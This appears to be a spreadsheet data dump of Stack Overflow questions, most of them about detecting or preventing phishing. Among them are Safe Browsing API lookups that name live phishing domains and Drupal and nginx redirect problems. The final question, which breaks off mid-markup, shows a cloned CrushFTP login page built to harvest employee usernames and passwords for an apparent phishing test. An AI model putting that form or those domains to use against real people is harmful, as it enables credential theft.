  |joedoe@info.com &amp;lt;mailto:joedoe@info.com&amp;gt;‚Äπ2 s‚Ä∫‚Äπ2 crlf‚Ä∫|
  |Contact number ‚Äπ2 crlf‚Ä∫|
  |‚Äπtb‚Ä∫‚Äπcrlf‚Ä∫|
  |Role ‚Äπ2 crlf‚Ä∫|
  |Other ‚Äπ2 crlf‚Ä∫|
  |Institution ‚Äπ2 crlf‚Ä∫|
  |‚Äπtb‚Ä∫‚Äπcrlf‚Ä∫|
  |Product ‚Äπ2 crlf‚Ä∫|
  |TEST product ‚Äπ2 crlf‚Ä∫|
  |Message ‚Äπ2 crlf‚Ä∫|
  |TEST question - please confirm receipt if received. ‚Äπ2 crlf‚Ä∫|
  |AAA-BBB-001366 ‚Äπ2 crlf‚Ä∫|
  |JAN 2020 ‚Äπ2 crlf‚Ä∫|
  | ‚Äπ2 crlf‚Ä∫|&lt;/code&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;excel&gt;&lt;vba&gt;&lt;outlook&gt;</t>
  </si>
  <si>
    <t>Google web-risk API and SafeBrowsing api returns safe for phishing site</t>
  </si>
  <si>
    <t>&lt;p&gt;Following instructions &lt;a href="https://cloud.google.com/web-risk/docs/lookup-api" rel="nofollow noreferrer"&gt;here&lt;/a&gt;, the following code appears to return good results on the example sites, but on an actual phishing site (&lt;code&gt;https://www.clicktrackingsall.com/a.php&lt;/code&gt;) it returns empty:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;const axios = require('axios');
 const apikey = '&amp;lt;apikey&amp;gt;';
 const req = (uri) =&amp;gt; `https://webrisk.googleapis.com/v1/uris:search?key=${apikey}&amp;amp;threatTypes=MALWARE&amp;amp;threatTypes=SOCIAL_ENGINEERING&amp;amp;threatTypes=UNWANTED_SOFTWARE&amp;amp;uri=${encodeURIComponent(uri)}`
 const checkUrl = async (url) =&amp;gt; {
  return axios.get(req(url));
 }
 // returns threatTypes: [ 'SOCIAL_ENGINEERING' ]
 checkUrl('http://testsafebrowsing.appspot.com/s/phishing.html').then(({data}) =&amp;gt; console.log(data));
 // returns threatTypes: [ 'MALWARE' ]
 checkUrl('http://testsafebrowsing.appspot.com/s/malware.html').then(({data}) =&amp;gt; console.log(data));
 // returns empty result
 checkUrl('https://www.clicktrackingsall.com/a.php').then(({data}) =&amp;gt; console.log(data));
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;When navigating to the page with chrome, it does block it.
 Using the &lt;a href="https://transparencyreport.google.com/safe-browsing/search?url=https:%2F%2Fwww.clicktrackingsall.com%2Fa.php" rel="nofollow noreferrer"&gt;google transparency report&lt;/a&gt; also returns phishing.&lt;/p&gt;
 &lt;p&gt;Also occurs when using the &lt;a href="https://developers.google.com/safe-browsing/v4/lookup-api" rel="nofollow noreferrer"&gt;Safe Browsing&lt;/a&gt; api &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;const axios = require('axios');
 const url = 'https://safebrowsing.googleapis.com/v4/threatMatches:find?key=&amp;lt;yourapikey&amp;gt;';
 const jsonReq = {
  "client": {
  "clientId": "&amp;lt;client-id&amp;gt;",
  "clientVersion": "&amp;lt;client-version&amp;gt;"
  },
  "threatInfo": {
  "threatTypes": [ "MALWARE", "SOCIAL_ENGINEERING", "UNWANTED_SOFTWARE", "POTENTIALLY_HARMFUL_APPLICATION"],
  "platformTypes": ["ANY_PLATFORM"],
  "threatEntryTypes": ["URL","EXECUTABLE"],
  "threatEntries": [
  {"url":"http://testsafebrowsing.appspot.com/s/phishing.html"},
  {"url":"http://testsafebrowsing.appspot.com/s/malware.html"},
  {"url":"https://www.clicktrackingsall.com/a.php"},
  {"url":"http://getnetflix.club/"}
  ]
  }
 };
 axios.post(url, jsonReq).then(result =&amp;gt; {
  console.log(JSON.stringify(result.data, null, 2));
 })
 /* prints:
 {
  "matches": [
  {
  "threatType": "SOCIAL_ENGINEERING",
  "platformType": "ANY_PLATFORM",
  "threat": {
  "url": "http://testsafebrowsing.appspot.com/s/phishing.html"
  },
  "cacheDuration": "300s",
  "threatEntryType": "URL"
  },
  {
  "threatType": "MALWARE",
  "platformType": "ANY_PLATFORM",
  "threat": {
  "url": "http://testsafebrowsing.appspot.com/s/malware.html"
  },
  "cacheDuration": "300s",
  "threatEntryType": "URL"
  }
  ]
 }*/
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Am I doing something wrong?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;safe-browsing&gt;&lt;safe-browsing-api&gt;&lt;google-cloud-webrisk&gt;</t>
  </si>
  <si>
    <t>How do you prevent your drupal site from redirecting to external sites via the q variable?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was wondering how to disallow anyone typing in a url similar to &lt;strong&gt;www.example.com/?q=http://www.evilsite.com&lt;/strong&gt;
 and instead redirect them to a 404 page or something else. As you can see, this introduces a phishing vulnerability. I know that somehow this is possible as I've seen previous installations redirect &lt;/p&gt;
 &lt;p&gt;FYI I currently have clean URLs enabled.
 My installation is drupal 6.x&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;drupal&gt;&lt;url&gt;&lt;redirect&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to prevent unauthorized domain forwarding via Nginx?</t>
  </si>
  <si>
    <t>&lt;p&gt;An unauthorized domain unauthdomain.cf is forwarding to our domain ourdomain.com. We tried to stop this unauthorized domain from rendering our content/pages via nginx but the solution on http but didnt work on https. &lt;/p&gt;
 &lt;p&gt;To Catch non authorized domains on both http and https, we tried the below: &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;server{ 
 listen 80 default_server; 
 root /aaa/bbb/www/404; 
 index index.html index.htm; 
 location / { 
 try_files $uri $uri/ =404; 
 } 
 } 
 server{ 
 listen 443 default_server; 
 root /aaa/bbb/www/404; 
 index index.html index.htm; 
 location / { 
 try_files $uri $uri/ =404; 
 } 
 } 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;But I received the error as&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Secure Connection Failed
 An error occurred during a connection to ourdomain.com. SSL received a 
 record that exceeded the maximum permissible length. Error code: 
 SSL_ERROR_RX_RECORD_TOO_LONG 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;My Domain Non-SSL V-host:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;server { 
 listen 80; 
 server_name ourdomain.com www.ourdomain.com; 
 server_tokens off; 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;My Domain SSL V-host: &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;server { 
 listen 443; 
 server_name ourdomain.com; 
 ssl on; 
 ssl_certificate /myssl_crt_file; 
 ssl_certificate_key /myssl_key_file; 
 ssl_protocols SSLv2 TLSv1 TLSv1.1 TLSv1.2; 
 ssl_ciphers ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-GCM-SHA256HE-RSA-AES256-GCM-SHA384HE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES256-SHAHE-RSA-AES256-SHA; 
 ssl_prefer_server_ciphers on; 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Any suggestions will greatly help!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ssl&gt;&lt;nginx&gt;&lt;https&gt;&lt;dns&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>PhoneGap source security</t>
  </si>
  <si>
    <t>&lt;p&gt;On the last section on &lt;a href="https://github.com/phonegap/phonegap/wiki/Platform-Security" rel="noreferrer"&gt;Platform Security&lt;/a&gt;, it mentioned a way to secure the source code in PhoneGap apps.&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Reverse engineering is a concern of many people that use PhoneGap since one can simply open an application binary and look at the JavaScript source code of the application. One could even go so far as to add malicious JavaScript code, re-package the application and re-submit it to app stores / markets in an attempt at app phishing. This practice could be undertaken with any application whether it is written with PhoneGap or otherwise since it is a similarly simple task to decompile either Java or Objective-C.&lt;/p&gt;
 &lt;p&gt;PhoneGap can actually get around this security concern since application developers can download JavaScript in their application at runtime, run that JavaScript, and delete it when the application closes. In that way, the source code is never on the device when the device is at rest. This is a much more difficult prospect with Java or Objective-C let alone the restrictions in the App Store around dynamically running Objective-C code.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;However, I would like to know how can I prevent others to download my source code on server?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;security&gt;&lt;cordova&gt;&lt;obfuscation&gt;</t>
  </si>
  <si>
    <t>how is single-sign-on not a risk similar to spoofing and phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;When you visit some websites, you can register and sign in as an authenticated member of some other organization (Google, Yahoo, etc).&lt;/p&gt;
 &lt;p&gt;What's to stop a malicious website from simply presenting a logon screen that purports to authenticate against those other sites, but is in actuality simply gathering usernames and passwords?&lt;/p&gt;
 &lt;p&gt;Could someone explain how such spoofing is prevented?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;single-sign-on&gt;</t>
  </si>
  <si>
    <t>Joomla password screen I've never seen before. Phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was doing some minor edits to our site when the screen changed to just a white screen with blue all caps text that says "PLEASE LOG IN TO CONTINUE." Below that is a box that is labeled "Password." No other text. No images. Nothing. I've never seen anything like this while working with Joomla. &lt;/p&gt;
 &lt;p&gt;I am just the person who does minor edits to the site. I am not a Joomla expert. I read the Joomla.org forums and posted a query there. No bites yet. I don't want to be the loser who gives out the password if this is a Phishing exercise. I can't log in, obviously, to do any digging around. The person who set up this site is long gone, so there is no admin to ask. I compared the source code of the login page to the home page of the site and the header is different. I don't know if that means anything or not. I just don't know enough about it.&lt;/p&gt;
 &lt;p&gt;Thanks for any help you can give.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;joomla2.5&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How is this googledrive.com phishing possible?</t>
  </si>
  <si>
    <t>&lt;p&gt;Recently I received a mail with the link: &lt;code&gt;http://googledrive.com/host/0B0uWu3qbasSeVjNCY1Nkekx5UkU&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;When I opened it, it showed a phishing page to grab my user name and password but surprisingly the certificate the website provided is a legitimate google certificate. How can a phishing site provide a valid server authentication certificate from google?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Selenium RemoteWebDriver against a Windows Service of ChromeDriver</t>
  </si>
  <si>
    <t>&lt;p&gt;Context: &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Windows 10 Home; &lt;/li&gt;
 &lt;li&gt;Visual Studio 2015 Community; &lt;/li&gt;
 &lt;li&gt;C#; &lt;/li&gt;
 &lt;li&gt;&lt;a href="https://nssm.cc" rel="nofollow"&gt;NSSM&lt;/a&gt;; &lt;/li&gt;
 &lt;li&gt;ChromeDriver 2.23.409699 (49b0fa931cda1caad0ae15b7d1b68004acd05129); &lt;/li&gt;
 &lt;li&gt;Nuget package Selenium.WebDriver.2.53.1; &lt;/li&gt;
 &lt;li&gt;Nuget package Selenium.WebDriver.ChromeDriver.2.23.0.1&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I have used &lt;a href="https://nssm.cc" rel="nofollow"&gt;NSSM&lt;/a&gt; to create a Windows Service wrapping chromedriver.exe, with the following settings:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Path: c:\bin\chromedriver.exe
 Startup Directory: c:\bin
 Arguments: --port=12942 --log-path=c:\temp\chromedriver.log --verbose 
 Service Name: ChromeDriverService
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;In VS2015Community I've created a C# app as follows:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;var uri = new Uri("http://localhost:12942");
 DesiredCapabilities dc = DesiredCapabilities.Chrome();
 ChromeOptions options = new ChromeOptions(); 
 options.BinaryLocation = "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe";
 options.LeaveBrowserRunning = true;
 dc.IsJavaScriptEnabled = true; 
 IWebDriver driver = new RemoteWebDriver(uri, dc);
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;When I step through the program, I get a &lt;code&gt;The HTTP request to the remote WebDriver server for URL http://localhost:12942/session timed out after 60 seconds.&lt;/code&gt; on the &lt;code&gt;new RemoteWebDriver&lt;/code&gt; line.&lt;/p&gt;
 &lt;p&gt;In the &lt;code&gt;c:\temp\chromedriver.log&lt;/code&gt; I get the following:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;[44.717][INFO]: COMMAND InitSession {
  "desiredCapabilities": {
  "browserName": "chrome",
  "javascriptEnabled": true,
  "platform": "ANY",
  "version": ""
  }
 }
 [66.168][INFO]: Populating Preferences file: {
  "alternate_error_pages": {
  "enabled": false
  },
  "autofill": {
  "enabled": false
  },
  "browser": {
  "check_default_browser": false
  },
  "distribution": {
  "import_bookmarks": false,
  "import_history": false,
  "import_search_engine": false,
  "make_chrome_default_for_user": false,
  "show_welcome_page": false,
  "skip_first_run_ui": true
  },
  "dns_prefetching": {
  "enabled": false
  },
  "profile": {
  "content_settings": {
  "pattern_pairs": {
  "https://*,*": {
  "media-stream": {
  "audio": "Default",
  "video": "Default"
  }
  }
  }
  },
  "default_content_setting_values": {
  "geolocation": 1
  },
  "default_content_settings": {
  "geolocation": 1,
  "mouselock": 1,
  "notifications": 1,
  "popups": 1,
  "ppapi-broker": 1
  },
  "password_manager_enabled": false
  },
  "safebrowsing": {
  "enabled": false
  },
  "search": {
  "suggest_enabled": false
  },
  "translate": {
  "enabled": false
  }
 }
 [66.171][INFO]: Populating Local State file: {
  "background_mode": {
  "enabled": false
  },
  "ssl": {
  "rev_checking": {
  "enabled": false
  }
  }
 }
 [68.099][INFO]: Can not set to US keyboard layout - Some keycodes may beinterpreted incorrectly
 [68.099][INFO]: Launching chrome: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-client-side-phishing-detection --disable-component-update --disable-default-apps --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --disable-web-resources --enable-logging --ignore-certificate-errors --load-component-extension="C:\WINDOWS\TEMP\scoped_dir5436_17406\internal" --log-level=0 --metrics-recording-only --no-first-run --password-store=basic --remote-debugging-port=12772 --safebrowsing-disable-auto-update --test-type=webdriver --use-mock-keychain --user-data-dir="C:\WINDOWS\TEMP\scoped_dir5436_20664" data:,
 [68.127][DEBUG]: DevTools request: http://localhost:12772/json/version
 [70.154][DEBUG]: DevTools response: {
  "Browser": "Chrome/52.0.2743.116",
  "Protocol-Version": "1.1",
  "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36",
  "WebKit-Version": "537.36 (@9115ecad1cae66fd5fe52bd9120af643384fd6f3)"
 }
 [70.155][DEBUG]: DevTools request: http://localhost:12772/json
 [70.168][DEBUG]: DevTools response: [ ]
 ... a minute's worth of the above two lines removed ...
 [128.264][INFO]: RESPONSE InitSession unknown error: unable to discover open pages
 [128.264][DEBUG]: Log type 'driver' lost 0 entries on destruction
 [128.264][DEBUG]: Log type 'browser' lost 0 entries on destruction
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I have a distant memory of having successfully talked to an NSSM-wrapped chromedriver.exe earlier this year. I can't find the code now. What am I missing here?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;c#&gt;&lt;selenium&gt;&lt;remotewebdriver&gt;&lt;nssm&gt;</t>
  </si>
  <si>
    <t>What does X-Sender-Id mean in email raw source (Found in phishing email)?</t>
  </si>
  <si>
    <t>&lt;p&gt;Somebody in my company is being subject to phishing. My first suggestion was just to change the password. However after awhile I received a fake mail from her address again. &lt;/p&gt;
 &lt;p&gt;Looking at the raw source of the email I found that there is another person's email in X-Sender-ID and I'm wondering who that might be. Is that the person who sent the email or can it be an account that has been hijacked? (I replaced the email with "somebody@host.com")&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;X-Virus-Scanned: OK
 Received: by smtp5.relay.iad3a.emailsrvr.com (Authenticated sender: somebody-AT-host.com) with ESMTPA id DF2788019C;
  Fri, 21 Nov 2014 07:54:42 -0500 (EST)
 X-Sender-Id: somebody@host.com
 Received: from smtp.emailsrvr.com ([UNAVAILABLE]. [2.133.148.211])
  by 0.0.0.0:587 (trex/5.3.2);
  Fri, 21 Nov 2014 12:54:46 GMT
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;What is X-Sender-ID? And what is the email it contains?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email-headers&gt;&lt;emailrelay&gt;&lt;sender-id&gt;&lt;interchange&gt;</t>
  </si>
  <si>
    <t>How to detect a red flag, phishing or malicious site with python 2.7?</t>
  </si>
  <si>
    <t>&lt;p&gt;I want to detect malicious sites using python.&lt;/p&gt;
 &lt;p&gt;Now, I've tried using &lt;code&gt;requests&lt;/code&gt; module to get the contents of a website, then would search for &lt;code&gt;malicious words&lt;/code&gt; in it. But, I didn't get it to work.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/f3vOj.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/f3vOj.png" alt="here example images of red page"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;this my all code : &lt;a href="https://pastebin.com/t43WqW8U" rel="nofollow noreferrer"&gt;link code&lt;/a&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;req_check = requests.get(url)
  if 'malicious words' in req_check.content:
  print ('[Your Site Detect Red Page] ===&amp;gt; '+url)
  else:
  print ('[Your Site Not Detect Red Page] ===&amp;gt; '+url)
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;python-2.7&gt;</t>
  </si>
  <si>
    <t>How can I call a environnement variable declared in my service.yml?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm working on a symfony project that need to be refactorized. 
 I'm trying to call a environnement variable declared in servces.yml
 When i'm running &lt;code&gt;php bin/console debug:container --parameters&lt;/code&gt; I can see the variables. &lt;/p&gt;
 &lt;p&gt;I tried &lt;code&gt;$this-&amp;gt;getParameters('param_name');&lt;/code&gt;
 When I'm dumping them in a controller it's working fine but when i'm trying to access them from a service it is failing -&gt; &lt;code&gt;Method 'getParameter' not found in 'TwitterService'&lt;/code&gt;
 I thought that this method was native in symfony. &lt;/p&gt;
 &lt;p&gt;Here is my twitter service&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;```namespace App\Services;
 use Abraham\TwitterOAuth\TwitterOAuth;
 /**
  * Class TwitterService.
  */
 class TwitterService
 {
  /** @const int NUMBER_OF_TWEETS */
  private const NUMBER_OF_TWEETS = 2;
  /**
  * @param string $twitterID
  *
  * @return array|object
  */
  public function getTwitterFeed($twitterID = 'RISKandMe')
  {
  // @todo move config to .env
  $consumerKey = $this-&amp;gt;getParameter('consumer_key');
  $consumerSecret = $this-&amp;gt;getParameter('consumer_secret');
  $accessToken = $this-&amp;gt;getParameter('access_token');
  $accessTokenSecret = $this-&amp;gt;getParameter('access_token');
  // Authenticate with twitter
  $twitterConnection = new TwitterOAuth(
  $consumerKey,
  $consumerSecret,
  $accessToken,
  $accessTokenSecret
  );
  // Get the user timeline feeds
  return $twitterConnection-&amp;gt;get(
  'statuses/user_timeline',
  [
  'screen_name' =&amp;gt; $twitterID,
  'count' =&amp;gt; self::NUMBER_OF_TWEETS,
  'exclude_replies' =&amp;gt; false,
  ]
  );
  }
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Here is my services.yml:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;parameters:
  locale: 'fr'
  api_key_validity: '%env(int:APIKEYVALIDITY)%'
  activation_delay: '%env(int:ACTIVATIONDELAY)%'
  gophish_api_key: '%env(GOPHISHAPIKEY)%'
  gophish_server: '%env(GOPHISHSERVER)%'
  gophish_white_list: '%env(GOPHISHWHITELIST)%'
  mailjet_public: '%env(MAILJET_PUBLIC_KEY)%'
  mailjet_secret: '%env(MAILJET_PRIVATE_KEY)%'
  sender_address: '%env(SENDER_ADDRESS)%'
  sender_name: '%env(SENDER_NAME)%'
  consumer_key: '%env(CONSUMER_KEY)%'
  consumer_secret: '%env(CONSUMER_SECRET)%'
  access_token: '%env(ACCESS_TOKEN)%'
  access_token_secret: '%env(ACCESS_TOKEN_SECRET)%'
 services:
  _defaults:
  autowire: true # Automatically injects dependencies in your services.
  autoconfigure: true # Automatically registers your services as commands, event subscribers, etc.
 # user_listener:
 # class: App\EntityListener\UserListener
 # arguments: ['@logger']
 # tags:
 # - { name: doctrine.orm.entity_listener,entity: App\Entity\User}
 #
  form_authenticator:
  class: App\Security\FormAuthenticator
  arguments: ["@logger","@router","@security.password_encoder","@doctrine.orm.default_entity_manager",CsrfTokenManagerInterface]
  token_authenticator:
  class: App\Security\TokenAuthenticator
  arguments: ["@logger","@router","@security.password_encoder","@doctrine.orm.default_entity_manager",CsrfTokenManagerInterface,ParameterBagInterface]
  DbUserProvider:
  class: App\Security\DbUserProvider
  FickleUserProvider:
  class: App\Security\FickleUserProvider 
  BackEndUserProvider:
  class: App\Security\BackEndUserProvider 
  App\:
  resource: '../src/*'
  exclude: '../src/{DependencyInjection,Entity,Migrations,Tests,Kernel.php}'
  App\Controller\Services\Helper:
  arguments: ['@logger','@router','@security.password_encoder','@mailer','@session','@doctrine.orm.default_entity_manager']
  tags: ['controller.service_arguments']
  App\Controller\Services\GoPhish:
  arguments: []
  tags: []
  App\Controller\:
  resource: '../src/Controller/DashboardController.php'
  arguments: ["@logger","@router","@security.password_encoder",'@doctrine.orm.default_entity_manager',App\Controller\Services\Helper]
  tags: ['controller.service_arguments']
  twig.extension.intl:
  class: Twig_Extensions_Extension_Intl
  tags:
  - { name: twig.extension }
 # session.listener:
 # class: App\Listeners\SessionListener
 # tags:
 # - { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
 # user.activity_listener:
 # class: App\Listeners\ActivityListener
 # tags:
 # - { name: kernel.event_listener, event: kernel.controller, method: onCoreController }
  Symfony\Component\HttpFoundation\Session\Storage\Handler\PdoSessionHandler:
  arguments:
  - '%env(string:DBCONNEXIONPARAMETERS)%'
  - { db_table: 'ht_session', db_username: '%env(string:DBUSER)%', db_password: '%env(string:DBPASSWORD)%'}
  app.services.twitter:
  class: App\Services\TwitterService
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;If someone has any idea they would be more than appreciated.&lt;/p&gt;
 &lt;p&gt;Thank you very much for you attention. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;environment-variables&gt;&lt;symfony4&gt;</t>
  </si>
  <si>
    <t>Login button not giving submit info while hitting enter works for getting credentials</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm currently creating a phishing test for my employees and I got into a problem.I'm hosting my index.html on my local server using xampp and I want to when someone logs that I can get their info.I made a post.php that gives me the info when i use an username and password and it works.But it only works when I hit enter,when I clik on login it just redirects me to a page I made and I don't get any info in my text file.While I hover over my login button (Activate) it gives me that it redirects to the redircet page that I made.Do you have any suggestions how can I make that m,y login button(activate in the code) still gives me the info as same when I hit enter?
 Thank you.&lt;/p&gt;
 &lt;p&gt;My code is below for index.html.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; &amp;lt;html&amp;gt;&amp;lt;head&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;form id=&amp;quot;loginForm&amp;quot; name=&amp;quot;loginForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;post.php&amp;quot; onsubmit=&amp;quot;return doLogin2();&amp;quot;&amp;gt;
  &amp;lt;div id=&amp;quot;panelbody&amp;quot;&amp;gt;
  &amp;lt;div id=&amp;quot;branding&amp;quot; class=&amp;quot;clearfix branding&amp;quot;&amp;gt;
  &amp;lt;img id=&amp;quot;loginWheel&amp;quot; src=&amp;quot;web%20FTP%20WebInterface_files/wheel.gif&amp;quot; style=&amp;quot;display: none;&amp;quot;&amp;gt;
  &amp;lt;a id=&amp;quot;defaultLogoLink&amp;quot; href=&amp;quot;http://www.crushftp.com/&amp;quot;&amp;gt;
  &amp;lt;img id=&amp;quot;imgLogo&amp;quot; src=&amp;quot;web%20FTP%20WebInterface_files/logo.png&amp;quot; style=&amp;quot;border-width:0px;float:left;&amp;quot;&amp;gt;
  &amp;lt;/a&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div id=&amp;quot;panelLogin&amp;quot;&amp;gt;
  &amp;lt;div&amp;gt;
  &amp;lt;label id=&amp;quot;UserNameText&amp;quot;&amp;gt;Username&amp;lt;/label&amp;gt;
  &amp;lt;input tabindex=&amp;quot;1&amp;quot; autocomplete=&amp;quot;on&amp;quot; type=&amp;quot;text&amp;quot; class=&amp;quot;textbox&amp;quot; name=&amp;quot;username&amp;quot; id=&amp;quot;username&amp;quot; value=&amp;quot;/&amp;quot;&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div&amp;gt;
  &amp;lt;label id=&amp;quot;PasswordText&amp;quot;&amp;gt;Password&amp;lt;/label&amp;gt;
  &amp;lt;input tabindex=&amp;quot;2&amp;quot; autocomplete=&amp;quot;on&amp;quot; type=&amp;quot;password&amp;quot; class=&amp;quot;textbox&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;&amp;quot;&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div id=&amp;quot;rememberMePanel&amp;quot;&amp;gt;
  &amp;lt;label&amp;gt;&amp;lt;input tabindex=&amp;quot;3&amp;quot; type=&amp;quot;checkbox&amp;quot; name=&amp;quot;remember&amp;quot; id=&amp;quot;remember&amp;quot; checked=&amp;quot;checked&amp;quot;&amp;gt; &amp;lt;span id=&amp;quot;RememberMeText&amp;quot;&amp;gt;Remember Me&amp;lt;/span&amp;gt;&amp;lt;/label&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div id=&amp;quot;acceptTC&amp;quot; style=&amp;quot;display: none&amp;quot;&amp;gt;
  &amp;lt;label&amp;gt;&amp;lt;input tabindex=&amp;quot;4&amp;quot; type=&amp;quot;checkbox&amp;quot; name=&amp;quot;tandc&amp;quot; id=&amp;quot;tandc&amp;quot;&amp;gt; &amp;lt;span id=&amp;quot;TnCText&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/label&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div style=&amp;quot;clear:both;height:1px;padding:0px;margin:0px;&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;div id=&amp;quot;recaptcha_div&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;div style=&amp;quot;clear:both;height:1px;padding:0px;margin:0px;&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;div class=&amp;quot;submit clearfix&amp;quot;&amp;gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;login&amp;quot; style=&amp;quot;display:none;&amp;quot;&amp;gt;
  &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;command&amp;quot; value=&amp;quot;login&amp;quot;&amp;gt;
  &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;skip_login&amp;quot; value=&amp;quot;true&amp;quot;&amp;gt;
  &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;encoded&amp;quot; value=&amp;quot;false&amp;quot;&amp;gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;login now&amp;quot; style=&amp;quot;position:absolute;left:-1000px;top:-1000px;&amp;quot;&amp;gt;
  &amp;lt;a class=&amp;quot;button&amp;quot; id=&amp;quot;btnLogin&amp;quot; href=&amp;quot;javascript:void(0);&amp;quot;&amp;gt;
  &amp;lt;span id=&amp;quot;LoginButtonText&amp;quot;&amp;gt;Login&amp;lt;/span&amp;gt;
  &amp;lt;/a&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;p class=&amp;quot;lostpassword&amp;quot; style=&amp;quot;visibility:hidden;&amp;quot;&amp;gt;
  &amp;lt;a href=&amp;quot;#&amp;quot; class=&amp;quot;showResetPanel&amp;quot; id=&amp;quot;ForgotPasswordLinkText&amp;quot;&amp;gt;I forgot my password&amp;lt;/a&amp;gt;
  &amp;lt;/p&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div id=&amp;quot;panelResetPass&amp;quot; style=&amp;quot;display:none;&amp;quot;&amp;gt;
  &amp;lt;div style=&amp;quot;clear:both;height:1px;padding:0px;margin:0px;&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;h3 class=&amp;quot;resetTitle&amp;quot; id=&amp;quot;RequestPasswordHeaderText&amp;quot;&amp;gt;Request Password&amp;lt;/h3&amp;gt;
  &amp;lt;div&amp;gt;
  &amp;lt;label id=&amp;quot;ResetUserNameText&amp;quot;&amp;gt;Username&amp;lt;/label&amp;gt;
  &amp;lt;input autocomplete=&amp;quot;off&amp;quot; type=&amp;quot;text&amp;quot; class=&amp;quot;textbox&amp;quot; name=&amp;quot;resetUserName&amp;quot; id=&amp;quot;resetUserName&amp;quot;&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div style=&amp;quot;clear:both;height:1px;padding:0px;margin:0px;&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;p&amp;gt;&amp;lt;/p&amp;gt;
